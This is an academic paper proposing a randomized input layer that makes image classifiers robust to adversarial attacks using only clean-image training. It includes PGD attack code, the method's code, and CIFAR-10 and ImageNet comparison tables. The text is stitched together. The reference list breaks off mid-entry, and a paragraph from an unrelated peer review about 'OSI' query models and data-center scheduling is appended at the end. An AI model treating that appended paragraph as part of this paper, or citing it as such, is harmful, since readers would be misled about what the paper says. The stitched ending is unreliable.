It turns out the progress is not optimistic: even a 1%-2% improvement on AutoAttack (Croce & Hein, 2020) requires a huge computational cost and, moreover, does not carry over to unseen attacks. Here we ask a question: "can we design a novel network, and a loss function thereof, that drives the network to be robust on its own, without awareness of adversarial attacks?" In other words, we do not intend to generate extra adversarial samples as most other approaches do; standard training with clean images is enough. Indeed, no prior knowledge of attacks should be needed at all. This poses a great challenge to the construction of the network, as it is not even clear whether it is feasible. On the other hand, it appears possible since deep networks have a very high capacity. Unfortunately, Ilyas et al. (2019) pointed out that networks tend to learn discriminative features that help correct classification, regardless of robustness. This motivates us to take the point of view of the network input side: how can we make a new input layer that is most suitable for network robustness?

Our intuition is essentially very simple. As attacks can always walk across the class decision boundary through malicious feature perturbations, feature squeezing appears to be helpful, at least in reducing the space that can be altered. However, fundamentally different from the work of Xu et al. (2018), we squeeze the input features in a random and controlled way, with parameters learned during training as shown in Figure 1, which will be elaborated in later sections. Experiments on CIFAR-10 and ImageNet demonstrate that this approach is very useful in promoting the robustness of networks.

In summary, we present an efficient approach that achieves state-of-the-art robust accuracy when attack computations are constrained, especially for black-box and $l_1$-, $l_2$-attacks, only through standard training with clean images and without any prior knowledge about the attacks.

2 RELATED WORKS

Some works add extra preprocessing steps. For example, in Yang et al. (2019), pixels are randomly dropped and then reconstructed using matrix estimation. Ours is not preprocessing: we just add an extra layer inside the network, and the network is trained and tested as usual, without explicit image completion. Besides this, to obtain high robust accuracy, Yang et al. (2019) needs adversarial training, while we adopt standard training with clean images. Another related work is certified adversarial robustness via randomized smoothing (Cohen et al., 2019).
There, the base classifier is trained with Gaussian data augmentation, and inference is based on the most likely class of the input perturbed by isotropic Gaussian noise. Ours is based on standard training and testing, and no perturbation-based training data augmentation is involved at all.

Recently, some works address robustness from the network architecture's perspective. Wu et al. (2021) investigate the impact of network width on model robustness and propose Width Adjusted Regularization. Similarly, Huang et al. (2021) thoroughly explore the architectural ingredients of adversarially robust deep neural networks. Liu et al. (2023a) establish via Rademacher complexity that higher weight sparsity is beneficial for adversarially robust generalization. Wang et al. (2022) propose batch normalization removal to improve adversarial training. Singla et al. (2021) show that using activation functions with low curvature values reduces both the standard and robust generalization gaps in adversarial training. This is in some sense similar to ours, but the motivations are fundamentally different: no adversarial training is involved in our approach at all. A Robust Vision Transformer has been advocated in Mao et al. (2022); under standard training it is better than previous Vision Transformers and CNNs, but unfortunately not comparable with the adversarial training methods, which are surpassed by ours.

Regularization has also been widely adopted in adversarial training. Cui et al. (2021) use logits from a clean model to guide the learning of a robust model. Spectral norm regularization based on Lyapunov theory has also been proposed in Rahnama et al. (2020) to improve robustness against $l_2$ adversarial attacks. Compared with these regularization methods, ours seeks a better network input layer design to make the network robust on its own.

3 BACKGROUND

A standard classification task can be described as follows:

$$\min_{\vartheta} \mathbb{E}_{(x,y) \sim D} [L(x, y, \vartheta)], \tag{1}$$

where data examples $x \in \mathbb{R}^d$ and corresponding labels $y \in [k]$ are drawn from the underlying distribution $D$, and $\vartheta \in \mathbb{R}^p$ are the model parameters to be optimized with respect to an appropriate function $L$, for instance the cross-entropy loss. When $x \in \mathbb{R}^d$ can be maliciously manipulated within a set of allowed perturbations $S \subseteq \mathbb{R}^d$, usually chosen as an $l_p$-ball ($p \in \{1, 2, \infty\}$) of radius $\epsilon$ around $x$, Equation (1) is modified to:

$$\min_{\vartheta} \mathbb{E}_{(x,y) \sim D} \left[ \max_{\delta \in S} L(x + \delta, y, \vartheta) \right]. \tag{2}$$

An adversary implements the inner maximization via various white-box or black-box attack algorithms, for example APGD$_\infty$ (Croce & Hein, 2020) or Square Attack (Andriushchenko et al., 2020). The basic multi-step projected gradient descent (PGD) is

$$x^{t+1} = \Pi_{x+S} \left( x^t + \alpha \, \text{sgn} (\nabla_x L(x^t, y, \vartheta)) \right), \tag{3}$$

where $\alpha$ denotes a step size and $\Pi$ is a projection operator. In essence, it uses the current gradient to update $x^t$ so that a better adversarial sample $x^{t+1}$ is obtained; some heuristics can be used to obtain better gradient estimates (Croce & Hein, 2020). On the other hand, the outer minimization is the goal of the defender.
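As a minimal PyTorch sketch of the inner maximization, the following implements the $l_\infty$ PGD iterate of Eq. (3); the step sizes and the valid pixel range $[0, 1]$ are illustrative defaults rather than values from our experiments.

```python
import torch
import torch.nn.functional as F

def pgd_linf(model, x, y, eps=8/255, alpha=2/255, steps=10):
    """Multi-step PGD: ascend L along the gradient sign, then project back
    onto the l_inf ball of radius eps around x (Eq. (3))."""
    x_adv = x.clone().detach()
    for _ in range(steps):
        x_adv.requires_grad_(True)
        loss = F.cross_entropy(model(x_adv), y)
        grad = torch.autograd.grad(loss, x_adv)[0]
        with torch.no_grad():
            x_adv = x_adv + alpha * grad.sign()        # gradient-sign ascent
            x_adv = x + (x_adv - x).clamp(-eps, eps)   # projection Pi_{x+S}
            x_adv = x_adv.clamp(0.0, 1.0)              # stay a valid image
    return x_adv.detach()
```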
Adversarial training is the most effective approach to this outer minimization, achieved by augmenting the training data with crafted samples. In fact, all current approaches, including test-time adaptive defenses (which need a base classifier), aim to learn the parameters of a pre-existing model to improve robustness. In this paper, we instead increase robustness through a specially designed input layer, such that standard training with clean images can be adopted.

4 METHOD

4.1 INPUT LAYER

As stated earlier, the goal of the input layer is to squeeze the input features in a random and controlled way. The whole procedure is depicted in Figure 1 and consists of the following steps:

1. The input $x$ with $r, g, b$ channels is normalized to zero mean and unit standard deviation via $\tilde{x} = \frac{x - \text{mean}}{\text{std}}$ in the input layer.
2. The normalized value $\tilde{x}$ goes through a $3 \times 3$ 2D convolution and a ReLU, producing $\hat{x}$ with three channels.
3. The final output $y$ is the Sigmoid of the element-wise three-term product $(\tilde{x} + \varepsilon) \times (\hat{x} - \delta) \times \left( \frac{1}{\hat{x} + \gamma} \right)$. Here $\varepsilon$ is a Gaussian random variable with mean 0 and standard deviation $\sigma$; $\delta$ is uniform on $[0, 1]$; and $\gamma$ is a small constant that keeps the denominator positive, set to $1 \times 10^{-5}$ in this paper.

In summary,

$$y = \frac{1}{1 + \exp \left( - \frac{(\tilde{x} + \varepsilon) \times (\hat{x} - \delta)}{\hat{x} + \gamma} \right)}. \tag{4}$$

Figure 1: Our specially designed input layer is inside the red rectangle. The input image $x$ is first normalized and then follows three paths. On one path, Gaussian noise $\varepsilon$ is added; the other two paths apply a $3 \times 3$ convolution and ReLU, followed respectively by subtraction of noise $\delta$ (uniform on $[0, 1]$) and by a reciprocal. Finally, all three terms are combined through multiplication and the result is fed to the Sigmoid. The output $y$ is used as the input to the classification network, the same as in other training approaches. An end-to-end training scheme is adopted to learn the parameters of the $3 \times 3$ convolution.

This formula can be interpreted as follows: $\tilde{x} + \varepsilon$ is a polluted version of the input image, and $\frac{\hat{x} - \delta}{\hat{x} + \gamma}$ modulates the image based on $\hat{x}$, which we name the sampling matrix; it has the same size as the input $x$. Due to the ReLU, $\hat{x}$ is always non-negative. Since $\delta$ is uniform on $[0, 1]$, the numerator $(\tilde{x} + \varepsilon) \times (\hat{x} - \delta)$ can be considered a random fraction $\hat{x} - \delta$ of $\tilde{x} + \varepsilon$ that is allowed to feed into the Sigmoid. The key motivation is that if we enforce $\hat{x}$ to be very small through a suitable loss function, the magnitude of $\frac{(\tilde{x} + \varepsilon) \times (\hat{x} - \delta)}{\hat{x} + \gamma}$ becomes large and the Sigmoid response lands in its saturated region, i.e., most elements of $y$ become either 0 or 1. In other words, the input features are squeezed in a random manner, where the parameters of the sampling matrix $\hat{x}$ are learned via end-to-end training.
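The following is a minimal PyTorch sketch of this input layer (Eq. (4)), together with the sparsity penalty $S$ described in Section 4.2 below; the module name, the scalar normalization constants, and the default initialization are illustrative assumptions rather than our exact implementation.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class RandomizedSqueeze(nn.Module):
    def __init__(self, sigma=0.5, gamma=1e-5, mean=0.5, std=0.25):
        super().__init__()
        # 3x3 convolution producing the "sampling matrix" x_hat (3 channels).
        self.conv = nn.Conv2d(3, 3, kernel_size=3, padding=1)
        self.sigma, self.gamma = sigma, gamma
        self.mean, self.std = mean, std  # assumed scalar normalization stats

    def forward(self, x):
        x_tilde = (x - self.mean) / self.std            # step 1: normalize
        x_hat = F.relu(self.conv(x_tilde))              # step 2: sampling matrix
        eps = self.sigma * torch.randn_like(x_tilde)    # Gaussian noise, std sigma
        delta = torch.rand_like(x_hat)                  # uniform noise on [0, 1]
        z = (x_tilde + eps) * (x_hat - delta) / (x_hat + self.gamma)
        return torch.sigmoid(z), x_hat                  # y of Eq. (4), plus x_hat

def sparsity_penalty(x_hat, beta=0.1):
    """S of Section 4.2: mean of the entries of x_hat above the threshold beta."""
    mask = x_hat > beta
    return x_hat[mask].mean() if mask.any() else x_hat.sum() * 0.0

# Training loss (Section 4.2): L = alpha * cross_entropy + S, with alpha = 0.1.
```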
4.2 LOSS FUNCTION

As mentioned earlier, we have to design a loss function that implements our motivation of making the sampling matrix $\hat{x}$ small. For each $\hat{x}$, we compute $S$, the average of all elements of $\hat{x}$ that are greater than some threshold $\beta$; a smaller $\beta$ pushes $\hat{x}$ to become sparser. The final loss function is:

$$L = \alpha \times L_{ce} + S, \quad (5)$$

where $L_{ce}$ is the cross-entropy loss and $\alpha$ is its weight. When $\alpha$ becomes large, the loss function falls back to standard cross-entropy. In summary, there are only three hyperparameters: the standard deviation $\sigma$ of the Gaussian noise, the threshold $\beta$, and the weight $\alpha$.

4.3 LAST MOVE

We emphasize that since our approach is randomized, the same sample can be classified with different logits when executed multiple times. This seriously misleads attackers, who will report a wrong robust accuracy. For that reason, we always take the last-move advantage. In other words, at test time we always take the adversarial samples generated by attackers and feed them to our network once again for evaluation. We believe this is fair in practice: attackers can take an arbitrarily long time to figure out a malicious sample, but they have only one chance to submit it. It is the attacker's responsibility to provide a stable adversarial sample, and the last move is always the defender's privilege.

| Paper | Clean | AA-$l_\infty$ | AA-$l_1$ | AA-$l_2$ | Square-$l_\infty$ | Square-$l_1$, $l_2$ |
|-----------------------|--------|---------------|----------|----------|-------------------|---------------------|
| Wang et al. (2023)# | 92.44 | 67.31 | 25.46 | 10.23 | 1.18 | 73.57 |
| Gowal et al. (2021)# | 87.50 | 63.38 | 27.91 | 10.85 | 1.94 | 68.90 |
| Dai et al. (2022)# | 87.02 | 61.55 | 26.28 | 11.22 | 1.98 | 66.99 |
| Wang et al. (2023)* | 95.16 | 49.33 | 3.86 | 46.08 | 6.59 | 67.02 |
| Rebuffi et al. (2021)* | 91.79 | 47.83 | 5.04 | 42.80 | 8.23 | 62.45 |
| Laidlaw et al. (2021) | 82.40 | 30.20 | 4.50 | 32.40 | 7.10 | 46.40 |
| Ours | 81.88 | **80.43** | **77.01** | **78.34** | **63.10** | **80.87** |

Table 1: AutoAttack comparison on CIFAR-10 (WideResNet-28-10 only, except ResNet-50 in Laidlaw et al. (2021)). * denotes models trained with $l_2$-$\epsilon$=0.5 and # models trained with $l_\infty$-$\epsilon$=8/255; both need extra training data. Attack budgets: $l_\infty$-$\epsilon$=8/255, 16/255; $l_1$-$\epsilon$=12 and $l_2$-$\epsilon$=2. Bold indicates the best in each column.

5 EXPERIMENTS

To verify the effectiveness of our approach, we conducted experiments on CIFAR-10 and ImageNet. Both the threshold $\beta$ and the weight $\alpha$ are set to 0.1 uniformly in our study, while the $\sigma$ of the Gaussian noise differs between the two datasets, as addressed below; this parameter is essentially tied to clean accuracy, which in turn depends on the dataset and network architecture. We evaluate on AutoAttack and Square Attack under $l_\infty$, $l_1$ and $l_2$. AutoAttack comprises four attacks, namely Auto-PGD with the cross-entropy and the Difference of Logits Ratio (DLR) losses, FAB-attack (Croce & Hein, 2020), and the black-box Square Attack (Andriushchenko et al., 2020), and is commonly used as a robustness evaluator. Square Attack is also used separately as a representative black-box attack, as it is of practical significance.

5.1 CIFAR-10

In this paper, we choose the wide residual network WideResNet-28-10 (Zagoruyko & Komodakis, 2016) as the base network, to which we add our specially designed input layer as described in Section 4. The $\sigma$ of the Gaussian noise is 0.5. The initial learning rate of 0.1 is scheduled to drop at epochs 30, 60, and 80 out of 100 in total, with a decay factor of 0.2. The weight decay factor is set to $5 \times 10^{-4}$, and the batch size is 200. To emphasize again, we only perform standard training for just 100 epochs.
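Putting Sections 4 and 5.1 together, below is a hypothetical sketch of one training step; `WideResNet28_10` is an assumed backbone implementation, `RandomSqueezeInput` is the sketch given earlier, and `mean`/`std` are the dataset normalization tensors.

```python
import torch
import torch.nn.functional as F

input_layer = RandomSqueezeInput(sigma=0.5)   # sigma = 0.5 for CIFAR-10
backbone = WideResNet28_10(num_classes=10)    # assumed backbone implementation
params = list(input_layer.parameters()) + list(backbone.parameters())
opt = torch.optim.SGD(params, lr=0.1, momentum=0.9, weight_decay=5e-4)

def train_step(x, targets, mean, std, alpha=0.1, beta=0.1):
    y, x_hat = input_layer(x, mean, std)      # squeezed input and sampling matrix
    logits = backbone(y)
    above = x_hat[x_hat > beta]               # entries above the threshold beta
    S = above.mean() if above.numel() > 0 else x_hat.sum() * 0.0
    loss = alpha * F.cross_entropy(logits, targets) + S   # Eq. (5)
    opt.zero_grad()
    loss.backward()
    opt.step()
    return loss.item()
```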
We compare our method with several state-of-the-art methods, all of which are based on adversarial training. $l_\infty$-, $l_1$- and $l_2$-AutoAttack (Croce & Hein, 2020) are adopted, and some results are shown in Table 1. All these models are trained against one particular type of attack, either with $l_\infty$-$\epsilon = 8/255$ or with $l_2$-$\epsilon = 0.5$, except that Laidlaw et al. (2021) adopts a neural perceptual threat model. Ours outperforms all other methods significantly against multiple unseen attacks, including the practical black-box Square Attack, although we only use standard training with clean images. Indeed, robustness against multiple attack models should be vital for applications, since we cannot assume that an attack will follow the simulations used for malicious sample generation in adversarial training methods. Unfortunately, most current works fail to generalize well to unseen attacks. Another significant advantage of ours is the computational cost shown in Table 2, where all other competitors are 3–5 orders of magnitude more expensive than ours. As our algorithm is random in nature, we also adopt the EOT test, as shown in Table 3. There are some drops in accuracy; however, ours is still much better than the others. Note that EOT incurs a large computational cost, so it is actually unfair to compare the robustness of networks without computation constraints.

| Paper | #Extra | #Epochs | #PGD | #Cost |
|-----------------------|--------|---------|------|-------------------|
| Wang et al. (2023)# | 20M | 2400 | 10 | $9.6 \times 10^4$ |
| Gowal et al. (2021)# | 100M | 2000 | 10 | $4 \times 10^5$ |
| Dai et al. (2022)# | 6M | 200 | 10 | $2.4 \times 10^3$ |
| Wang et al. (2023)* | 50M | 1600 | 10 | $1.6 \times 10^5$ |
| Rebuffi et al. (2021)* | 1M | 800 | 10 | $1.6 \times 10^3$ |
| Ours | 0 | 100 | 0 | 1 |

Table 2: Computational cost comparison. Excluding the cost of gathering extra data, the training cost in #Cost is roughly the product of #Epochs (training epochs), #Extra (extra data), and #PGD (PGD steps used in adversarial input generation), normalized with respect to ours, i.e., 50K inputs and 100 epochs of standard training, which is denoted by 1.

| Attacks | APGD$_{\text{ce}}$ | APGD$_{\text{dlr}}$ |
|------------------------------|-------|-------|
| $l_\infty$-$\epsilon$=8/255 | 75.96 | 77.46 |
| $l_\infty$-$\epsilon$=16/255 | 57.92 | 64.48 |
| $l_1$-$\epsilon$=12 | 67.89 | 67.68 |
| $l_2$-$\epsilon$=2 | 47.18 | 55.74 |

Table 3: The EOT accuracy under APGD$_{\text{ce}}$ and APGD$_{\text{dlr}}$ attacks on CIFAR-10.

5.2 IMAGENET

ImageNet is the most challenging dataset for adversarial defense. In this paper, ImageNet refers to ImageNet-1k unless stated otherwise, and robustness is evaluated only on the 5000 images of the ImageNet validation set, as in RobustBench (Croce et al., 2021). For simplicity, we choose the ConvNeXt-T + ConvStem architecture of Singh et al. (2023). Our training scheme is very simple: all parameters are randomly initialized, followed by standard training for 50 epochs with heavy augmentations but without CutMix (Yun et al., 2019) and MixUp (Zhang et al., 2018), as these would undermine the viability of our sampling matrix. In contrast, for the same ConvNeXt-T + ConvStem, although the ConvStem of Singh et al. (2023) is randomly initialized, the ConvNeXt-T part comes from a strong pre-trained model, which usually takes about 300 epochs.
Thus the whole network needs an extra 100 epochs of standard training to reach good clean accuracy, followed by 300 epochs of adversarial training with 2-step APGD. So the total cost is up to $300 + 100 + 300 \times (2 \text{ (APGD steps)} + 1 \text{ (weight update)}) = 1300$, which is around $1300/50 = 26$ times bigger than ours.

| Architecture | Paper | Clean | AA-$l_\infty$ 4/255 | AA-$l_\infty$ 8/255 | AA-$l_1$ | AA-$l_2$ | Square-$l_\infty$ 4/255 | Square-$l_\infty$ 8/255 | Square-$l_1$ | Square-$l_2$ |
|---|---|---|---|---|---|---|---|---|---|---|
| ConvNeXt-T + ConvStem | Singh et al. (2023) | 72.74 | 49.46 | 24.10 | 24.50 | 48.40 | 63.42 | 52.44 | 49.40 | 68.06 |
| ConvNeXt-T + ConvStem | Ours | 69.92 | **65.92** | **52.64** | **68.46** | **69.44** | 69.48 | **68.52** | **69.40** | 69.28 |
| Swin-L | Liu et al. (2023b)* | 78.92 | 59.56 | 32.72 | 26.88 | 52.02 | **70.38** | 61.56 | 55.52 | **74.18** |
| ConvNeXt-L | Liu et al. (2023b)* | 78.02 | 58.48 | 32.00 | 26.18 | 52.22 | 70.12 | 61.04 | 54.40 | 72.86 |
| ConvNeXt-T + ConvStem | Singh et al. (2023) | 77.00 | 57.70 | 31.86 | 22.38 | 47.02 | 69.66 | 59.48 | 54.18 | 72.80 |

Table 4: AutoAttack comparison on ImageNet. $l_\infty$-$\epsilon$=4/255, 8/255; $l_1$-$\epsilon$=75 and $l_2$-$\epsilon$=2. Bold indicates the best in each column. * denotes models pre-trained on ImageNet-21k.

Figure 2: The two halves are arranged in a similar way. The first row shows the inputs $x$ (valley and great-white-shark), and the next two rows show the corresponding sampling matrix $\hat{x}$ and the final output $y$, with the three channels aligned. It is very interesting to note that the continuous patterns are highly squeezed into the two extreme values, 0 and 1, in $y$, due to the very small $\hat{x}$. Nevertheless, the V-shaped pattern of the valley can still be identified in $y$; indeed, this image is classified correctly. Surprisingly, although the features of the great-white-shark are buried by our intentionally injected noise, it is classified correctly as well.

| Attacks | APGD$_{\text{ce}}$ | APGD$_{\text{dlr}}$ |
|------------------------------|-------|-------|
| $l_\infty$-$\epsilon$=4/255 | 45.80 | 52.50 |
| $l_\infty$-$\epsilon$=8/255 | 17.08 | 26.54 |
| $l_1$-$\epsilon$=75 | 67.58 | 68.50 |
| $l_2$-$\epsilon$=2 | 68.60 | 69.54 |

Table 5: The EOT accuracy under APGD$_{\text{ce}}$ and APGD$_{\text{dlr}}$ attacks on ImageNet.

| Architecture | Paper | Clean | Square-$l_\infty$ 4/255 | Square-$l_\infty$ 8/255 | Square-$l_1$ | Square-$l_2$ | E-Square-$l_\infty$ 4/255 | E-Square-$l_\infty$ 8/255 | E-Square-$l_1$ | E-Square-$l_2$ |
|---|---|---|---|---|---|---|---|---|---|---|
| ConvNeXt-T + ConvStem | Singh et al. (2023) | 72.20 | 65.80 | 55.20 | 51.20 | 69.00 | 61.60 | 43.40 | 42.00 | 66.80 |
| ConvNeXt-T + ConvStem | Ours | 71.40 | 70.00 | **70.00** | **72.20** | 71.80 | **69.60** | **70.00** | **70.00** | 70.00 |
| Swin-L | Liu et al. (2023b)* | 79.80 | **70.60** | 60.80 | 55.00 | **74.40** | 66.40 | 52.00 | 46.80 | **71.80** |

Table 6: Square Attack comparison on 500 images of the ImageNet validation set instead of the 5000 in Table 4. $l_\infty$-$\epsilon$=4/255, 8/255; $l_1$-$\epsilon$=75 and $l_2$-$\epsilon$=2. Bold indicates the best in each column. * denotes models pre-trained on ImageNet-21k. The query budget is 5K iterations for Square Attack and 50K for E-Square (Enhanced-Square Attack).

As shown in Table 4, ours beats Singh et al. (2023) by a large margin in almost all tests.
For a more solid comparison, we also include other methods with more sophisticated architectures, namely Swin-L and ConvNeXt-L from Liu et al. (2023b); ours is only slightly behind on Square Attack with $l_\infty$-$\epsilon$=4/255 and $l_2$-$\epsilon$=2. Some example feature maps from our input layer are shown in Figure 2. The input $x$, the sampling matrix $\hat{x}$, and the final output $y$ are shown in three rows. Our specially designed input layer changes the input $x$ into a $y$ that is extremely squeezed. On the one hand, this poses a great challenge to the network; on the other hand, it improves robustness.

Regarding the EOT tests, the negative impact on robust accuracy is almost negligible for $l_1$ and $l_2$, while for $l_\infty$ there is a relatively large drop. However, we stress again that, in fact, every defense is weak given sufficient computational resources. As shown in Table 6, when we increase the query limit of Square Attack from the 5K used in AutoAttack to 50K (denoted Enhanced-Square), there is up to a 12% decrease in robust accuracy for Singh et al. (2023) and about 9% for Liu et al. (2023b). Interestingly, because of randomness and the last-move strategy, ours stands firm, sometimes even exceeding its clean accuracy. Due to resource constraints, only 500 images are evaluated.

6 DISCUSSION

Our approach is efficient and effective; however, one may raise a big concern with respect to obfuscated gradients or adaptive attacks. Since the work of Athalye et al. (2018), the adversarial defense community has been conservative about the validity of claims of effective defenses. However, Athalye et al. (2018) only investigates attack strategies for the types of attacks already seen, without taking the attacker's computational load into account, which is not sufficient. For example, adversarial training with $l_\infty$=8/255 is usually evaluated with $l_\infty$=8/255. In practice, the attacker should not be confined to launching only attack types that the defender has seen before, and computational resources should be restricted, for example, to a certain number of queries; otherwise, the defender can reject attacks that take too much time through other security measures. In fact, unseen attacks break defenses much more easily than the hand-crafted and sophisticated adaptive attacks of Athalye et al. (2018), so they should come first. According to our thorough experiments, ours achieves the state of the art in this regard; almost all previous approaches generalize poorly to unseen attacks.

The other big question may be why this approach can be so robust. The key idea is that we try to unleash the great potential of deep networks in an unusual way. The input features are squeezed randomly, so the network has to identify robust features to achieve high clean accuracy, and the impact of attacks is thereby minimized.

There are some limitations to this approach. Firstly, the clean accuracy is lower than the state of the art. Secondly, as the sampling matrix $\hat{x}$ relies on a $3 \times 3$ convolution of the input, it might be misled by the recently proposed occlusion attack (Duan et al., 2023). Thirdly, ours is only verified by experiments, and there is no theoretical robustness guarantee.

7 SUMMARY

In this paper, we present a simple approach that uses only standard training with clean images, yet achieves state-of-the-art robust accuracy against unseen $l_1$-, $l_2$-, and $l_\infty$-attacks simultaneously. The method is verified on the CIFAR-10 and ImageNet datasets.
In future work, we will improve the clean accuracy and address the occlusion attack. Theoretical analysis is also needed to better understand why the approach works so well.

REFERENCES

Maksym Andriushchenko, Francesco Croce, Nicolas Flammarion, and Matthias Hein. Square attack: A query-efficient black-box adversarial attack via random search. In Andrea Vedaldi, Horst Bischof, Thomas Brox, and Jan-Michael Frahm (eds.), Computer Vision - ECCV 2020 - 16th European Conference, Glasgow, UK, August 23-28, 2020, Proceedings, Part XXIII, volume 12368 of Lecture Notes in Computer Science, pp. 484–501. Springer, 2020. doi: 10.1007/978-3-030-58592-1_29. URL https://doi.org/10.1007/978-3-030-58592-1_29.

Anish Athalye, Nicholas Carlini, and David A. Wagner. Obfuscated gradients give a false sense of security: Circumventing defenses to adversarial examples. In Jennifer G. Dy and Andreas Krause (eds.), Proceedings of the 35th International Conference on Machine Learning, ICML 2018, Stockholmsmässan, Stockholm, Sweden, July 10-15, 2018, volume 80 of Proceedings of Machine Learning Research, pp. 274–283. PMLR, 2018. URL http://proceedings.mlr.press/v80/athalye18a.html.

Yang Bai, Yuyuan Zeng, Yong Jiang, Shu-Tao Xia, Xingjun Ma, and Yisen Wang. Improving adversarial robustness via channel-wise activation suppressing. In 9th International Conference on Learning Representations, ICLR 2021, Virtual Event, Austria, May 3-7, 2021. OpenReview.net, 2021. URL https://openreview.net/forum?id=zQTezqCcTNx.

Zhuotong Chen, Qianxiao Li, and Zheng Zhang. Towards robust neural networks via close-loop control. In 9th International Conference on Learning Representations, ICLR 2021, Virtual Event, Austria, May 3-7, 2021. OpenReview.net, 2021. URL https://openreview.net/forum?id=2AL06y9cDE-.

Jeremy M. Cohen, Elan Rosenfeld, and J. Zico Kolter. Certified adversarial robustness via randomized smoothing. In Kamalika Chaudhuri and Ruslan Salakhutdinov (eds.), Proceedings of the 36th International Conference on Machine Learning, ICML 2019, 9-15 June 2019, Long Beach, California, USA, volume 97 of Proceedings of Machine Learning Research, pp. 1310–1320. PMLR, 2019. URL http://proceedings.mlr.press/v97/cohen19c.html.

Francesco Croce and Matthias Hein. Minimally distorted adversarial examples with a fast adaptive boundary attack. In Proceedings of the 37th International Conference on Machine Learning, ICML 2020, 13-18 July 2020, Virtual Event, volume 119 of Proceedings of Machine Learning Research. PMLR, 2020.

Francesco Croce and Matthias Hein. Reliable evaluation of adversarial robustness with an ensemble of diverse parameter-free attacks. In Proceedings of the 37th International Conference on Machine Learning, ICML 2020, 13-18 July 2020, Virtual Event, volume 119 of Proceedings of Machine Learning Research, pp. 2206–2216. PMLR, 2020. URL http://proceedings.mlr.press/v119/croce20b.html.

Francesco Croce, Maksym Andriushchenko, Vikash Sehwag, Edoardo Debenedetti, Nicolas Flammarion, Mung Chiang, Prateek Mittal, and Matthias Hein. Robustbench: a standardized adversarial robustness benchmark. In Joaquin Vanschoren and Sai-Kit Yeung (eds.), Proceedings of the Neural Information Processing Systems Track on Datasets and Benchmarks, 2021.

Francesco Croce, Sven Gowal, Thomas Brunner, Evan Shelhamer, Matthias Hein, and A. Taylan Cemgil. Evaluating the adversarial robustness of adaptive test-time defenses. In Kamalika Chaudhuri, Stefanie Jegelka, Le Song, Csaba Szepesvári, Gang Niu, and Sivan Sabato (eds.), International Conference on Machine Learning, ICML 2022, 17-23 July 2022, Baltimore, Maryland, USA, volume 162 of Proceedings of Machine Learning Research, pp. 4421–4435. PMLR, 2022. URL https://proceedings.mlr.press/v162/croce22a.html.

Jiequan Cui, Shu Liu, Liwei Wang, and Jiaya Jia.
Learnable boundary guided adversarial training. In 2021 IEEE/CVF International Conference on Computer Vision, ICCV 2021, Montreal, QC, Canada, October 10-17, 2021, pp. 15701–15710. IEEE, 2021. doi: 10.1109/ICCV48922.2021.01543. Sihui Dai, Saeed Mahloujifar, and Prateek Mittal. Parameterizing activation functions for adversarial robustness. In 43rd IEEE Security and Privacy, SP Workshops 2022, San Francisco, CA, USA, May 22-26, 2022, pp. 80–87. IEEE, 2022. doi: 10.1109/SPW54247.2022.9833884. Ranjie Duan, Yuefeng Chen, Yao Zhu, Xiaojun Jia, Rong Zhang, and Hui Xue. Inequality phenomenon in $l_\infty$-adversarial training, and its unrealized threats. In The Eleventh International Conference on Learning Representations, ICLR 2023, Kigali, Rwanda, May 1-5, 2023. OpenReview.net, 2023. URL https://openreview.net/pdf?id=4t9g35BxGr. Sven Gowal, Chongli Qin, Jonathan Uesato, Timothy A. Mann, and Pushmeet Kohli. Uncovering the limits of adversarial training against norm-bounded adversarial examples. CoRR, abs/2010.03593, 2020. URL https://arxiv.org/abs/2010.03593. Sven Gowal, Sylvestre-Alvise Rebuffi, Olivia Wiles, Florian Stimberg, Dan Andrei Calian, and Timothy A. Mann. Improving robustness using generated data. In Marc’Aurelio Ranzato, Alina Beygelzimer, Yann N. Dauphin, Percy Liang, and Jennifer Wortman Vaughan (eds.), Advances in Neural Information Processing Systems 34: Annual Conference on Neural Information Processing Systems 2021, NeurIPS 2021, December 6-14, 2021, virtual, pp. 4218–4233, 2021. URL https://proceedings.neurips.cc/paper/2021/hash/21ca6d0cf2f25c4dbb53d8dc0b679c32-Abstract.html. Chuan Guo, Mayank Rana, Moustapha Cissé, and Laurens van der Maaten. Countering adversarial images using input transformations. In 6th International Conference on Learning Representations, ICLR 2018, Vancouver, BC, Canada, April 30 - May 3, 2018, Conference Track Proceedings. OpenReview.net, 2018. URL https://openreview.net/forum?id=SyJ7ClWCb. Dan Hendrycks, Kimin Lee, and Mantas Mazeika. Using pre-training can improve model robustness and uncertainty. In Kamalika Chaudhuri and Ruslan Salakhutdinov (eds.), Proceedings of the 36th International Conference on Machine Learning, ICML 2019, 9-15 June 2019, Long Beach, California, USA, volume 97 of Proceedings of Machine Learning Research, pp. 2712–2721. PMLR, 2019. URL http://proceedings.mlr.press/v97/hendrycks19a.html. Hanxun Huang, Yisen Wang, Sarah M. Erfani, Quanquan Gu, James Bailey, and Xingjun Ma. Exploring architectural ingredients of adversarially robust deep neural networks. In Marc’Aurelio Ranzato, Alina Beygelzimer, Yann N. Dauphin, Percy Liang, and Jennifer Wortman Vaughan (eds.), Advances in Neural Information Processing Systems 34: Annual Conference on Neural Information Processing Systems 2021, NeurIPS 2021, December 6-14, 2021, virtual, pp. 5545–5559, 2021. URL https://proceedings.neurips.cc/paper/2021/hash/2bd7f907b7f5b6bbd91822c0c7b835f6-Abstract.html. Andrew Ilyas, Shibani Santurkar, Dimitris Tsipras, Logan Engstrom, Brandon Tran, and Aleksander Madry. Adversarial examples are not bugs, they are features. In Hanna M. Wallach, Hugo Larochelle, Alina Beygelzimer, Florence d’Alché-Buc, Emily B. Fox, and Roman Garnett (eds.), Advances in Neural Information Processing Systems 32: Annual Conference on Neural Information Processing Systems 2019, NeurIPS 2019, 8-14 December 2019,
As in previous work, OSI in hindsight is common in some applications, such as data-center scheduling, where the state is revealed after the action is taken (so the effect of the action can be observed). However, the query model in this paper allows the agent to query part of the state before the action is taken. Even the motivating examples (e.g., autonomous driving) seem to advocate the former setup, which reveals the state after taking actions. Although the conclusions of the paper may still hold in the case where the query happens after taking actions, a discussion of which model is better aligned with the real world would be appreciated.
